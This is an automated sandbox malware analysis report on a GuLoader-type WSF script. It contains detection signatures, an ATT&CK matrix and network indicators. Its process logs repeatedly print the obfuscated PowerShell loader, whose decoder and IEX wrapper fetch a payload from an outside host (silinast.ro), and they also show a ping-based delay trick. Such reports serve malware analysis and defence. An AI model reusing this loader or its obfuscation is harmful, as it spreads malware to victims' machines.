              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: powershell.exe, 00000004.00000002.2138100600.000002CC9D367000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.4232905007.0000000007035000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_029EDAAC LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,9_2_029EDAAC

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_7468.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7468, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7936, type: MEMORYSTR
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:DagbrJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#nettenes semipopular overstates photodrome #>;$lighedsideologis='omrrer';<#arbejdsbevgelser allodialist amanist lydkilden bortvejrede peristole #>;$occipitobregmatic=$recrate149+$host.'privatedata';if ($occipitobregmatic) {$rykkendes++;}function ridsning89($kabine){$tardy=$gehejmeraaden+$kabine.length-$rykkendes; for( $antilogarithmic=7;$antilogarithmic -lt $tardy;$antilogarithmic+=8){$achim='filterbredders';$molition+=$kabine[$antilogarithmic];$facetter='krigserklringer';}$molition;}function ruttendes80($driftsregnskabet){ & ($ansgningsfristen151) ($driftsregnskabet);}$nondiffusible=ridsning89 'm.urernm hem,meoalfaderzhexin,nitingsvil platonlsk ddera v nero/dublan 5 dumpek.fisende0 van.it ostrace( penc lw sever,i sym olnskoles.dnonubiqomissilswh,dderrslistles semi acnlivegent ,istol mngder 1habitus0strandf.pronoun0 unloqu;wh tero rundsawoppriorieroderinnjesb,g6maatter4gerning;rekrter villaexgydning6rensni,4barrica;undisc foggi r luorev noelge: ytri.g1humors 2underho1chrysa .knivsme0triker,) kademi postedgselvbyge jergarcindtageksh ndyioun easi/per ore2airchec0konform1subtrak0afvegne0coloniz1 is,ide0moviepk1 bovrup skrudsafungoadeidyslysirkonstruef rekomfsteto kohydr baxorkidxj/ so,ial1turbomo2banc,dr1 doozie. e ilog0polyaem ';$enere=ridsning89 'boningeusmmomets forthce reinfurcirc mv-.oninteaglairiegtitt pye duss snlinuxwit emul e ';$oversaettelser=ridsning89 ' temp lhtilendetfagretltjuleferpsuissef: andomr/ nthrac/ avidlysbaldakiipodargilfiletfai flaxwonferskvaalycop rsindes.rt akettr.odisblarkatedero anfgte/causticksuboperooverfrimelf nbemund.rstu unmakntoneskiidementek loc,moutransmut afgoeretillg brr turnenpregalve fagidisdisarti.rettetai debetsnbarneskf hj,rpe ';$rustrdes=ridsning89 'snrkled>kol nna ';$ansgningsfristen151=ridsning89 'admittaigtesengeb talinxshownce ';$lifefully169='forvrredes';$fagbog='\selvsikkerhedens.pan';ruttendes80 (ridsning89 'rygskca$konomiigbughindlspoonfuoaf ekslbinduk,iatehtterl un ors:uskad la kont ar mora detjen.ren compriipo eredg una so=strappa$stttekrelampetcntrenchav af.ejs:udringeaimmunogprullerspga enesdstraffoaop egnitfuracioacloques+tredve.$rec ilifoverskgabogach gswaverpbsexsymboorgueslgnazdrow ');ruttendes80 (ridsning89 'satinsk$po encegcol,barlsecretio ultrasbrampageafumlendl ompo t:solariur vel,ilepaaklismsidstemiforblfnsheterotequadruprstandarnbroderiexiphipl=unpatri$cuttlefoz.braerv pposite n gacirbnk bids dwe.leaholbaekeso,brretoralizetplia.tneomvurd l sysselsbrintboehym.arirforsker..almonis monu,epn.tlistlmycof oisubricttbajadse(formule$bra.skoremotiviukowbirdsisnennet torherroverid.dfrowsiled.ctyopsstre.kd) maskab ');ruttendes80 (ridsning89 ',rindeh[ trypaont rolsuefiligratm,ltino.beratedsvgaviseekadrernr arneruvartesynipreexpec iretogeopodidyptriang,oskattemihankytonafvarsltfissio.muigenneaoverflynoutrowsa fortrigoffertoeeksponer housli]distill:vaadesk:dagbr
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#nettenes semipopular overstates photodrome #>;$lighedsideologis='omrrer';<#arbejdsbevgelser allodialist amanist lydkilden bortvejrede peristole #>;$occipitobregmatic=$recrate149+$host.'privatedata';if ($occipitobregmatic) {$rykkendes++;}function ridsning89($kabine){$tardy=$gehejmeraaden+$kabine.length-$rykkendes; for( $antilogarithmic=7;$antilogarithmic -lt $tardy;$antilogarithmic+=8){$achim='filterbredders';$molition+=$kabine[$antilogarithmic];$facetter='krigserklringer';}$molition;}function ruttendes80($driftsregnskabet){ & ($ansgningsfristen151) ($driftsregnskabet);}$nondiffusible=ridsning89 'm.urernm hem,meoalfaderzhexin,nitingsvil platonlsk ddera v nero/dublan 5 dumpek.fisende0 van.it ostrace( penc lw sever,i sym olnskoles.dnonubiqomissilswh,dderrslistles semi acnlivegent ,istol mngder 1habitus0strandf.pronoun0 unloqu;wh tero rundsawoppriorieroderinnjesb,g6maatter4gerning;rekrter villaexgydning6rensni,4barrica;undisc foggi r luorev noelge: ytri.g1humors 2underho1chrysa .knivsme0triker,) kademi postedgselvbyge jergarcindtageksh ndyioun easi/per ore2airchec0konform1subtrak0afvegne0coloniz1 is,ide0moviepk1 bovrup skrudsafungoadeidyslysirkonstruef rekomfsteto kohydr baxorkidxj/ so,ial1turbomo2banc,dr1 doozie. e ilog0polyaem ';$enere=ridsning89 'boningeusmmomets forthce reinfurcirc mv-.oninteaglairiegtitt pye duss snlinuxwit emul e ';$oversaettelser=ridsning89 ' temp lhtilendetfagretltjuleferpsuissef: andomr/ nthrac/ avidlysbaldakiipodargilfiletfai flaxwonferskvaalycop rsindes.rt akettr.odisblarkatedero anfgte/causticksuboperooverfrimelf nbemund.rstu unmakntoneskiidementek loc,moutransmut afgoeretillg brr turnenpregalve fagidisdisarti.rettetai debetsnbarneskf hj,rpe ';$rustrdes=ridsning89 'snrkled>kol nna ';$ansgningsfristen151=ridsning89 'admittaigtesengeb talinxshownce ';$lifefully169='forvrredes';$fagbog='\selvsikkerhedens.pan';ruttendes80 (ridsning89 'rygskca$konomiigbughindlspoonfuoaf ekslbinduk,iatehtterl un ors:uskad la kont ar mora detjen.ren compriipo eredg una so=strappa$stttekrelampetcntrenchav af.ejs:udringeaimmunogprullerspga enesdstraffoaop egnitfuracioacloques+tredve.$rec ilifoverskgabogach gswaverpbsexsymboorgueslgnazdrow ');ruttendes80 (ridsning89 'satinsk$po encegcol,barlsecretio ultrasbrampageafumlendl ompo t:solariur vel,ilepaaklismsidstemiforblfnsheterotequadruprstandarnbroderiexiphipl=unpatri$cuttlefoz.braerv pposite n gacirbnk bids dwe.leaholbaekeso,brretoralizetplia.tneomvurd l sysselsbrintboehym.arirforsker..almonis monu,epn.tlistlmycof oisubricttbajadse(formule$bra.skoremotiviukowbirdsisnennet torherroverid.dfrowsiled.ctyopsstre.kd) maskab ');ruttendes80 (ridsning89 ',rindeh[ trypaont rolsuefiligratm,ltino.beratedsvgaviseekadrernr arneruvartesynipreexpec iretogeopodidyptriang,oskattemihankytonafvarsltfissio.muigenneaoverflynoutrowsa fortrigoffertoeeksponer housli]distill:vaadesk:dagbr
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#nettenes semipopular overstates photodrome #>;$lighedsideologis='omrrer';<#arbejdsbevgelser allodialist amanist lydkilden bortvejrede peristole #>;$occipitobregmatic=$recrate149+$host.'privatedata';if ($occipitobregmatic) {$rykkendes++;}function ridsning89($kabine){$tardy=$gehejmeraaden+$kabine.length-$rykkendes; for( $antilogarithmic=7;$antilogarithmic -lt $tardy;$antilogarithmic+=8){$achim='filterbredders';$molition+=$kabine[$antilogarithmic];$facetter='krigserklringer';}$molition;}function ruttendes80($driftsregnskabet){ & ($ansgningsfristen151) ($driftsregnskabet);}$nondiffusible=ridsning89 'm.urernm hem,meoalfaderzhexin,nitingsvil platonlsk ddera v nero/dublan 5 dumpek.fisende0 van.it ostrace( penc lw sever,i sym olnskoles.dnonubiqomissilswh,dderrslistles semi acnlivegent ,istol mngder 1habitus0strandf.pronoun0 unloqu;wh tero rundsawoppriorieroderinnjesb,g6maatter4gerning;rekrter villaexgydning6rensni,4barrica;undisc foggi r luorev noelge: ytri.g1humors 2underho1chrysa .knivsme0triker,) kademi postedgselvbyge jergarcindtageksh ndyioun easi/per ore2airchec0konform1subtrak0afvegne0coloniz1 is,ide0moviepk1 bovrup skrudsafungoadeidyslysirkonstruef rekomfsteto kohydr baxorkidxj/ so,ial1turbomo2banc,dr1 doozie. e ilog0polyaem ';$enere=ridsning89 'boningeusmmomets forthce reinfurcirc mv-.oninteaglairiegtitt pye duss snlinuxwit emul e ';$oversaettelser=ridsning89 ' temp lhtilendetfagretltjuleferpsuissef: andomr/ nthrac/ avidlysbaldakiipodargilfiletfai flaxwonferskvaalycop rsindes.rt akettr.odisblarkatedero anfgte/causticksuboperooverfrimelf nbemund.rstu unmakntoneskiidementek loc,moutransmut afgoeretillg brr turnenpregalve fagidisdisarti.rettetai debetsnbarneskf hj,rpe ';$rustrdes=ridsning89 'snrkled>kol nna ';$ansgningsfristen151=ridsning89 'admittaigtesengeb talinxshownce ';$lifefully169='forvrredes';$fagbog='\selvsikkerhedens.pan';ruttendes80 (ridsning89 'rygskca$konomiigbughindlspoonfuoaf ekslbinduk,iatehtterl un ors:uskad la kont ar mora detjen.ren compriipo eredg una so=strappa$stttekrelampetcntrenchav af.ejs:udringeaimmunogprullerspga enesdstraffoaop egnitfuracioacloques+tredve.$rec ilifoverskgabogach gswaverpbsexsymboorgueslgnazdrow ');ruttendes80 (ridsning89 'satinsk$po encegcol,barlsecretio ultrasbrampageafumlendl ompo t:solariur vel,ilepaaklismsidstemiforblfnsheterotequadruprstandarnbroderiexiphipl=unpatri$cuttlefoz.braerv pposite n gacirbnk bids dwe.leaholbaekeso,brretoralizetplia.tneomvurd l sysselsbrintboehym.arirforsker..almonis monu,epn.tlistlmycof oisubricttbajadse(formule$bra.skoremotiviukowbirdsisnennet torherroverid.dfrowsiled.ctyopsstre.kd) maskab ');ruttendes80 (ridsning89 ',rindeh[ trypaont rolsuefiligratm,ltino.beratedsvgaviseekadrernr arneruvartesynipreexpec iretogeopodidyptriang,oskattemihankytonafvarsltfissio.muigenneaoverflynoutrowsa fortrigoffertoeeksponer housli]distill:vaadesk:dagbrJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information22
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		22
              Scripting              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping1
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		21
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		Logon Script (Windows)Logon Script (Windows)11
              Process Injection              		Security Account Manager21
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook2
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets1
              Remote System Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials1
              System Network Configuration Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem13
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Prosba o oferte.wsf8%VirustotalBrowse
              Prosba o oferte.wsf13%ReversingLabsScript-WScript.Trojan.GuLoader

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              silinast.ro10%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
              http://silinast.ro10%VirustotalBrowse
              https://github.com/Pester/Pester1%VirustotalBrowse
              http://silinast.ro/Kommunikuternes.inf9%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              silinast.ro
              		188.241.183.45
              		truefalseunknown
              6777.6777.6777.677e
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://silinast.ro/Kommunikuternes.inftrueunknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://silinast.ropowershell.exe, 00000004.00000002.2103502610.000002CC86B70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2103502610.000002CC86A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2103502610.000002CC866B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmptrueunknown
                http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://silinast.ro/Kommunikuternes.infPpowershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmptrue
                  		unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://aka.ms/pscore6lBpowershell.exe, 00000009.00000002.4214260996.0000000004551000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://go.micropowershell.exe, 00000004.00000002.2103502610.000002CC8590B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/powershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://silinast.ro/Kommunikuternes.infXR$lXpowershell.exe, 00000009.00000002.4214260996.00000000046A9000.00000004.00000800.00020000.00000000.sdmptrue
                    		unknown
                    https://aka.ms/pscore68powershell.exe, 00000004.00000002.2103502610.000002CC84C81000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://silinast.roXhpowershell.exe, 00000004.00000002.2103502610.000002CC86A09000.00000004.00000800.00020000.00000000.sdmptrue
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.2103502610.000002CC84C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.4214260996.0000000004551000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://silinast.roXRpowershell.exe, 00000004.00000002.2103502610.000002CC86B70000.00000004.00000800.00020000.00000000.sdmptrue
                        		unknown
                        https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmpfalseunknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        188.241.183.45
                        		silinast.roRomania
                        		5588GTSCEGTSCentralEuropeAntelGermanyCZfalse

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1528867
                        Start date and time:2024-10-08 10:58:18 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 1s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:12
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Prosba o oferte.wsf
                        Detection:MAL
                        Classification:mal100.troj.expl.evad.winWSF@11/7@2/1
                        EGA Information:Failed
                        HCA Information:
                        • Successful, ratio: 88%
                        • Number of executed functions: 59
